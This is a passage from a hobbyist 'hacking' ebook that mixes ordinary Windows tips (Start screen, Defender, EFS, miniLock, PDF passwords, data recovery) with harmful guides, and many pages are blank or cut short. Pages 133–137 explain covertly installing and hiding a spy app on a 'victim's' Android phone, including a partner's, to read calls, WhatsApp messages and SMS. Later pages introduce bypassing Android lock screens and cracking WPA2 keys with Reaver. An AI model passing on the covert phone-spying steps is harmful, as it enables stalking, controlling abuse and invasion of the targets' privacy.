116 Hack-x-crypt
easier still. So long as you’re in the Start screen, just begin typing the
name of a document in a library or an application and the search box
will appear automatically.
If your Windows 8 Start screen is cluttered with tiles, try grouping them
so that the related ones are kept together. Drag your first tile to an
open space at the left or right of the Start screen. When a grey bar
appears behind it, to indicate that it’s part of a new group, release the
tile. Now drag the other tiles that you want to appear in the group into
the same area.
Next, click the Update tab and click the Update button to update
Windows Defender’s malware definitions. If this is the first time you’ve
used Windows Defender, it’s also worth performing a full system scan
by selecting Full from the Scan options list on the Home tab and clicking
the Scan now button.
UJJWAL SAHAY
117 Hack-x-crypt
Although there are lots of things that can slow down your PC and make
Windows slow to start, one of the easiest to sort out is fragmentation
of the hard disk. You don’t need any third-party tools to do the job
either, since Windows provides all you need. It could take quite some
time, though, and it’ll affect performance while it’s running, so set it
going when you’re not going to be using your PC. Just search for Disk
Defragmenter in the Start menu.
UJJWAL SAHAY
118 Hack-x-crypt
If you don’t want to type in a password every time you use your PC, you
can use a picture as a password instead.
On the Sign-in options screen, click Add under Picture password and
choose a picture from your PC to use as a password.
Once a picture has been chosen, you’ll be taken through the process of
drawing three different (and memorable) gestures anywhere on it using
the touchscreen, mouse or track pad. You’ll then need to repeat all
three gestures to log into your user account, but you can still use your
usual password.
UJJWAL SAHAY
119 Hack-x-crypt
UJJWAL SAHAY
120 Hack-x-crypt
What is encryption?
Encrypting File System (EFS) is a feature of Windows that you can use to
store information on your hard disk in an encrypted format. Encryption
is the strongest protection that Windows provides to help you keep
your information secure.
UJJWAL SAHAY
121 Hack-x-crypt
This is what MINILOCK looks like once it has generated a public key.
UJJWAL SAHAY
122 Hack-x-crypt
Generating your ID
Now i show you how to set up your ID, we’ll walk through how to
encrypt a file so you can see how it works. Make sure you back up the
test file in unencrypted form just in case something goes wrong.
UJJWAL SAHAY
123 Hack-x-crypt
You’ll see the above image when a file is ready for ENCRYPTION.
To choose a file, either tap the file-drop area in the miniLock window or
drag a file from File Explorer and drop it in the window.
The application’s window will then flips around and reveal space for
entering up to four miniLock IDs.
By default, your miniLock ID will appear at the top, as you are the
person encrypting the file. Below that, you’ll have the option to add
another three people you want to be able to access the encrypted the
file – assuming you have their miniLock ID. If you wanted to send this
file to one person and didn’t want to have access to it yourself, simply
click the X to the far right of your miniLock ID to remove your key.
UJJWAL SAHAY
124 Hack-x-crypt
Decrypting
Decrypting a file is even easier than encrypting. Once you receive your
miniLock-encrypted file via email (or whatever method), download it to
your PC and drop it into the miniLock window. As long as you are signed
in to miniLock and the file is encrypted with your miniLock ID, the file
will be automatically decrypted. Then you can save it to your PC the
same way you did with the encrypted file.
That’s about all there is to miniLock. The only drawback that some
people might find is that you have to sign-in every time you open the
app. MiniLock does not save your login across user sessions. That was
likely a conscious choice to protect your privacy.
UJJWAL SAHAY
125 Hack-x-crypt
Now these days it’s a big deal to secure your PDF documents. In this
article I will show you that “HOW TO PROTECT YOUR PDF FILES FROM
BEING COPIED FOR PIRATION AND OTHER MALITIOUS INTENTIONS”.
For protecting your PDF files you can use a tool “A-PDF password
security” to protect a PDF file. You can set password and prevent
people from copy and paste PDF contents, here is an easy tutorial to
make you aware about the use of that tool.
UJJWAL SAHAY
126 Hack-x-crypt
select the option “single pdf document security” and push the
button “next>”
Click “browse” button to open a pdf file will be encrypted, select
the security level and encryption method. You can setup
password for opening and modification of your document.
UJJWAL SAHAY
127 Hack-x-crypt
After saving the file you will choose to open saved PDF file with
the default PDF viewer, set another PDF file security or open
destination folder in windows explorer.
UJJWAL SAHAY
128 Hack-x-crypt
UJJWAL SAHAY
129 Hack-x-crypt
Let’s assume if you want to leave any message for your brother and
sister who have user accounts associated with the same pc in which
you have also a user account.
So follow these steps to pass any message which you to another user
account at his next login.
UJJWAL SAHAY
130 Hack-x-crypt
Select any another user account which you want to pass the
message.
Then click on the “send message” option place in the lower right
corner.
UJJWAL SAHAY
131 Hack-x-crypt
Let’s assume you have hided any folder simply. And when you will
search it by name from the address bar it will be opened easily.
So let’s think that if there will be any folder without name then how can
it be possible to search it from address bar or search box.
UJJWAL SAHAY
132 Hack-x-crypt
When it asks to rename the folder just click ALT key and by keep
pressing the ALT key press “2, 5, 5” one by one.
And then enter.
You will find that there it creates a folder without having any
name.
UJJWAL SAHAY
133 Hack-x-crypt
Hello friends, now in this article we will learn that how to spy over an
android phone. Now these days are the era of smart phones based on
android specially. In this article I will show you that how to get the
details of the victim by spying over victim’s android phone. This is the
best way to keep tracking your child and also your girlfriends.
UJJWAL SAHAY
134 Hack-x-crypt
By using this tool you can easily keep tracking the victim’s android
phone.
I am showing you the screen shots of those things which we can spy
from an android phone…such as CALL HISTORY, WHATSAPP
MESSAGES, and SMS DETAILS etc. …list is shown below in the
screenshot.
UJJWAL SAHAY
135 Hack-x-crypt
UJJWAL SAHAY
136 Hack-x-crypt
First of all you have to download the apk file of this tool and
install it on the victim’s android phone and log into it.
This tool is only of 800kb so you can easily manage it within
seconds.
UJJWAL SAHAY
137 Hack-x-crypt
A very interesting thing is about this tool is that you can also hide
this tool from the victims android phone.so that victim will not
aware about it.
Now you can download the apk file from the website
(my.thetruthspy.com).
After installing the app go on the same website of the app by
your computer and resister using your email id and login to view
the details of the victim’s android phone.
For getting details get ensure that the data connection of the
victims phone should be ON.
When you want to unhide the app from the victim’s phone just
make a call from the victim’s phone to #2013*.
UJJWAL SAHAY
138 Hack-x-crypt
In this article I are going to tell you that how to control your computer
fully by your mobile phone. It’s a very interesting thing for you if you
got tired by using the track pad and keyboard of your computer.
UJJWAL SAHAY
139 Hack-x-crypt
Unified remote is an app that lets you control your entire windows
computer from your android device.it turns your device into a Wi-Fi or
Bluetooth remote control for all the programs on your computer. With
this app you can control a wide range of applications, including simple
mouse and keyboard, media players and other external gadgets that
can be connected to your computer(such as USB-UIRT and tell stick). it
even provides extensive capabilities for users to create their own
custom remotes for their needs.
UJJWAL SAHAY
140 Hack-x-crypt
The “Basic input” remote will prompt the mouse, which you can
use as a track pad.
Instructions for using the mouse will appear on screen.
Also there are lot of options are available by which you can
control your computer in different ways.
UJJWAL SAHAY
141 Hack-x-crypt
UJJWAL SAHAY
142 Hack-x-crypt
Here I have a nice windows trick for you which saves your much time.
In this article we will learn that how to launch GOD MODE in your
computer.
UJJWAL SAHAY
143 Hack-x-crypt
UJJWAL SAHAY
144 Hack-x-crypt
And you will see that the icon of that folder will be changed and
when you will open it you will find all the settings arranged in
well manner in it.
UJJWAL SAHAY
145 Hack-x-crypt
In this article we are going to learn that how to bypass the android lock
screen.
We are going to bypass the lock screen using a tool name as Aroma File
manager.
UJJWAL SAHAY
146 Hack-x-crypt
This is the best method for crack android pattern lock; you must have
custom recovery installed on your device in order to use this method.
Let’s start the cracking android lock screen.
First of all download Aroma File manager zip file. Google it and
you will find it easily.
Now copy this Aroma file manager zip to root of your SD card.
After copying zip file to SD, boot your phone into Recovery mode
UJJWAL SAHAY
147 Hack-x-crypt
UJJWAL SAHAY
148 Hack-x-crypt
Well, in this article I will show you that how to crack WPA2-PSK key
using a tool names as REAVER. Reaver use to crack the key by brute
force method.
UJJWAL SAHAY
149 Hack-x-crypt
UJJWAL SAHAY
150 Hack-x-crypt
UJJWAL SAHAY
151 Hack-x-crypt
Checking your firewall sounds complicated, but it really isn’t. If you own
a Windows-based system, just go to your control panel and type
“firewall” in the search box. If your firewall is “on” or “connected” then
you’re good to go. If you own a Mac, click the Apple icon on your
toolbar, go to “system preferences,” then “security,” then “firewall”
Making sure you have a firewall in place can go a long way toward
keeping criminals out. Make sure that you share some of your folders
only on the home network. If you don’t really need your files to be
visible to other machines, disable file and media sharing completely.
UJJWAL SAHAY
152 Hack-x-crypt
service like Dropbox, where you get 2GB of storage for free. Antiviruses
like Kaspersky PURE has backup functionality as well, including Dropbox
integration.
Spotting a rogue website can be difficult, but there are a few things you
can do to hone your skills. Look for a green lock in the address bar and
the code prefix “https://” at the beginning of the URL while visiting
banking sites, entering your credit card data or accessing your web
mail. Be careful when shopping at a website that ships items from
overseas, and don’t click on links sent to you in email messages, go
directly to the website itself instead.
If you see a deal for 90% off The Beatles Collection CD, it very well
could be a knock off. Even worse, some sites are known to lure
customers in with an amazing deal, and once they have your credit card
information they’re never to be heard from again – your identity may
be compromised and there’s not even a product to show for it. The
simple rule of thumb here is: If it looks too good to be true then it
probably is.
UJJWAL SAHAY
153 Hack-x-crypt
UJJWAL SAHAY
154 Hack-x-crypt
UJJWAL SAHAY
155 Hack-x-crypt
UJJWAL SAHAY
156 Hack-x-crypt
By using this tool you can recover your accidently deleted data from
your computer.
UJJWAL SAHAY
157 Hack-x-crypt
After that it scans for all the deleted files/folder from your
particular selected local drive.
And show you the list of the entire folder from which files are
deleted.
UJJWAL SAHAY
158 Hack-x-crypt
Then you have to select your deleted file/folder which you want
to recover, as I have selected here “hacking tools” from the folder
“vi”.
And then click on the recover option to recover your data
successfully.
UJJWAL SAHAY
159 Hack-x-crypt
CONCLUSION: -
Thanks For reading this book and I hope the
contents described in this book will help you to know
the intents of hackers. Now you are capable of
securing your own and your surrounding computers,
mobile phones and other networks from the Threat
we called “HACKING- An art of exploitation ”.
BIBLIOGRAPHY
UJJWAL SAHAY
This book was distributed courtesy of:
For your own Unlimited Reading and FREE eBooks today, visit:
http://www.Free-eBooks.net
Share this eBook with anyone and everyone automatically by selecting any of the
options below:
COPYRIGHT INFORMATION
Free-eBooks.net respects the intellectual property of others. When a book's copyright owner submits their work to Free-eBooks.net, they are granting us permission to distribute such material. Unless
otherwise stated in this book, this permission is not passed onto others. As such, redistributing this book without the copyright owner's permission can constitute copyright infringement. If you
believe that your work has been used in a manner that constitutes copyright infringement, please follow our Notice and Procedure for Making Claims of Copyright Infringement as seen in our Terms
of Service here:
http://www.free-ebooks.net/tos.html